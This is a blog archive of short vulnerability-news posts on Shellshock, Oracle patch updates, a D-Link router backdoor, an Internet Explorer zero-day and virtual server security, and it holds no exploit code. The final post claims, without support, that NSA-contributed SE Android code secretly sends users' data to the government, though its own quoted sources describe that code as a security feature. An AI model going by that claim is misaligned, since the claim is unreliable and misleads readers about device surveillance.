Category Archives: Vulnerability News

Vulnerability News

#Shellshock bug – critical vulnerability in the Bash Unix command-line interpreter

Shellshock or Bashdoor is a  security bug found in Unix Bash shell. It is a critical flaw which has been discovered on 24 September 2014 by Akamai Technologies security researcher Stephane Chazelas. “Many Internet daemons, such as web servers, use Bash to process certain commands, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system” (Wikipedia, 2014). Targeted system must have a script or application which attempts to call Bash in order for the attack to succeed.

Common Vulnerabilities and Exposures database (CVE)

The flaw was originally assigned CVE-2014-6271, but it was later discovered that the patch had an issue in the parser and did not fully address the problem. MITRE later assigned CVE-2014-7169 and CVE-2014-6277,  4.3 CVE-2014-6278, 4.4 CVE-2014-7169
4.5 CVE-2014-7186, and 4.6 CVE-2014-7187 to cover the remaining problems after the application of the first patch. (Wikipedia, 2014).

CVSS Severity (version 2.0):

CVSS v2 Base Score: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C) (legend)

Impact Subscore: 10.0

Exploitability Subscore: 10.0

CVSS Version 2 Metrics:

Access Vector: Network exploitable

Access Complexity: Low

Authentication: Not required to exploit Continue reading #Shellshock bug – critical vulnerability in the Bash Unix command-line interpreter

Advertisements

Oracle Critical Patch Updates for April 2014

Oracle has released April 2014 critical Patch Updates addressing serious flaws and vulnerabilities that have been identified. ” Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory” (Oracle, 2014). The patches address  104 security vulnerabilities consisting of Fusion Middleware, Hyperion, Oracle Database, Supply Chain Product Suite,  Siebel CRM, Java SE, and Sun Microsystems Products Suite, including Oracle Linux and Virtualization, iLearning , People-soft Enterprise and Oracle MySQL (Summerised in table 1 below). Due to the serious security lapses caused  by threats and vulnerabilities oracle recommends applying the patches as soon as possible . This Critical Patch Update contains 104 new security fixes across the product families listed below.

“Among the patches that should be prioritized are two bugs in Oracle’s database products. The more severe of these two issues could lead to a full compromise of impacted Windows systems, though exploitation would require that an attacker authenticate him or herself. Other platforms like Linux and Solaris are less affected because the database does not extend into the underlying operating system there”( Threatpost , 2014). Also fixing five vulnerabilities affecting Oracle Linux and Virtualization products. To find out more Click here to visit Oracle site Continue reading Oracle Critical Patch Updates for April 2014

Oracle Critical Updates

Oracle has released its Critical Patch Update for October 2013 to address 127 vulnerabilities across multiple products.
It consists of 51 Java vulnerabilities, 21 have a CVSS scores of at least 9 ie. The attack vector is so hight that an attacker could control the vulnerability to hack the system. 12 vulnerabilities have a CVSS score of 10, which means and attacker could use these vulnerabilities to hijack a system distantly without requiring verification.
Qualys CTO Wolfgang Kandek states that many of the 76 other vulnerabilities addressed in Oracle’s other products allow for remote unauthenticated access for an attacker. Therefore IT admins to apply these patches, predominantly those connecting to applications that are accessible through the internet
This update contains the following security fixes:
• 6 for Oracle Industry Applications
• 1 for Oracle Financial Services Software
• for Oracle Supply Chain Products Suite
• 8 for Oracle PeopleSoft Products
• 9 for Oracle Siebel CRM
• 2 for Oracle Primavera Products Suite
• 17 for Oracle Fusion Middleware
• 4 for Oracle Enterprise Manager Grid Control
• 1 for 51 for Oracle Java SE
• 12 for Oracle and Sun Systems Products Suite
• 2 for Oracle Virtualization
• 8 for Oracle MySQL
• 2 for Oracle Database Oracle E-Business Suite
• 2 for Oracle iLearning
Visit oracle website for more in-depth analysis

Alert:A backdoor found in many D-Link devices allows to bypass authentication

Are you using Dlink wireless router? You need to watch out if your device is one of the following or any Dlink family (more info to be available as more tests are made available on affected devices);

  1. DIR-100
  2. DIR-120
  3. DI-624S
  4. DI-524UP
  5. DI-604S
  6. DI-604UP
  7. DI-604+
  8. TM-G5240

The backdoor identified enables the attacker to access the administration web interface of network devices without any authentication and view/change its settings. The backdoor was found in the  firmware v1.13. for more information visit http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/. The article the Reverse Engineering a D-Link Backdoor.

How to mitigate the vulnerability

The company also offered this advice: “As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.”http://www.dlink.com

Also ensure that;

  1. Unsolicited emails – Don’t open any unsolicited emails from unknown people or organisations. by clicking the URL you might enable unauthorized user access your router administration page;
  2. Make sure that your wireless network is secure by enabling secure communication by use of encryption (AES is the clear choice for best security);
  3. Disable remote access of your router (this is disabled by default);
  4. Download the firmware install guide provided within the ZIP firmware package and update the firmware when Dlink officially releasing the patch (visit http://www.dlink.com/uk/en/support/security for any official release of Dlink updates)
  5. Lastly, Ensure strong authentication passwords to access administration interfaces.

The flaw is serious as the attacker with the technical know-how of how to conduct the attack. I would recommend that we check the model of Dlink devices being used so as to determine if the devices we are using are affected and monitor closely the traffic in these devices. The firmware to be upgraded as soon as Dllink releases the update.

Emergency Microsoft Security Advisory (2887505) – Vulnerability in Internet Explorer Could Allow Remote Code Execution

M

icrosoft has released emergency advisory ‘Vulnerability in Internet Explorer Could Allow Remote Code Execution’ which is a zero day exploit that hackers exploited zero day vulnerability in IE versions 8 and 9 on Windows XP and Windows 7. This is after investigating public reports of the vulnerability. The vulnerability affects “all supported versions of its browser (IE6, IE7, IE8, IE9, IE10, and IE11).” ( Emil Protalinski, 2013).

Zero day vulnerabilities also known as zero day attacks are software holes or backdoors that are not known by the vendor, meaning that the attack occurs on ‘day zero of reaction of the exposure. The developers will have had zero days to address and patch the vulnerability.

The company has found that the flaw could potentially affect all supported versions, although it says that running “modern versions” of IE has the advantage of additional security features that can help prevent successful attacks. The flaw in question makes remote code execution possible if you browse to a website containing malicious content for your specific browser type (an attacker can either compromise a regularly frequented and trusted site or convince the user to click a link in another application). Continue reading Emergency Microsoft Security Advisory (2887505) – Vulnerability in Internet Explorer Could Allow Remote Code Execution

Securing virtual servers

Every organization is going for virtualization. The main reason being cost cutting and to ensure maximum utilization of hardware resources. Virtualization has revolutionized the data centre and is one of the key foundational technologies underlying cloud computing. This has made Several companies rushing frantically into deploying virtualization solutions both in their private and public clouds, without taking into account the risks involved.  But when organizations are going virtualization, the technology has got its own inherent vulnerabilities.

Continue reading Securing virtual servers

“THE BIG BROTHER” PRISM AND HOW IS BEING PROPAGATED IN ANDROID BASED DEVICES

Information security, cyber security and system auditor enthusiasts have been preoccupied on the China Hackers, Anonymous and Otherhacking groups. Was this a diversionary tactic by the big brother. He has been busy developing legislations to tighten cyber security, some of this legislation are against constitutional right of Right for privacy, Was it a conspiracy. Now we are taken of guard when the reality hits us about prism. Which is used to harvest data for security purposes.

Many of us have heard A new 0s on the block growing daily and bringing new company and internet experience, The Android. Android is a tree 0s developed by google and used in myriads of devices like the smartphones, computer tablets, Camera etc

The scary part of it is that when you are having a good time with Your family, friends lover S and business associates. The devices are secretly monitoring you and tending the info to be big bother Scary! are you scared? That the tip on the ice . you thought nobody is watching.This has been confirmed by google  “Through its open-source Android project, Google has agreed to incorporate code, first developed by the agency in 2011, into future versions of its mobile operating system, which according to market researcher IDC runs on three-quarters of the smartphones shipped globally in the first quarter. NSA officials say their code, known as Security Enhancements for Android, isolates apps to prevent hackers and marketers from gaining access to personal or corporate data stored on a device. Eventually all new phones, tablets, televisions, cars, and other devices that rely on Android will include NSA code, agency spokeswoman Vanee’ Vines said in an e-mailed statement. NSA researcher Stephen Smalley, who works on the program, says, “Our goal is to raise the bar in the security of commodity mobile devices.”

“Vines wouldn’t say whether the agency’s work on Android and other software is part of or helps with Prism. “The source code is publicly available for anyone to use, and that includes the ability to review the code line by line,” she said in her statement. Most of the NSA’s suggested additions to the operating system can already be found buried in Google’s latest release—on newer devices including Sony’s Xperia Z, HTC’s One, and Samsung Electronics’ Galaxy S4. Although the features are not turned on by default, according to agency documentation, future versions will be. In May the Pentagon approved the use of smartphones and tablets that run Samsung’s mobile enterprise software, Knox, which also includes NSA programming, the company wrote in a June white paper. Sony, HTC, and Samsung declined to comment.

When you are taking a photo of your family. Making a business deal. Beware by brother is watching you!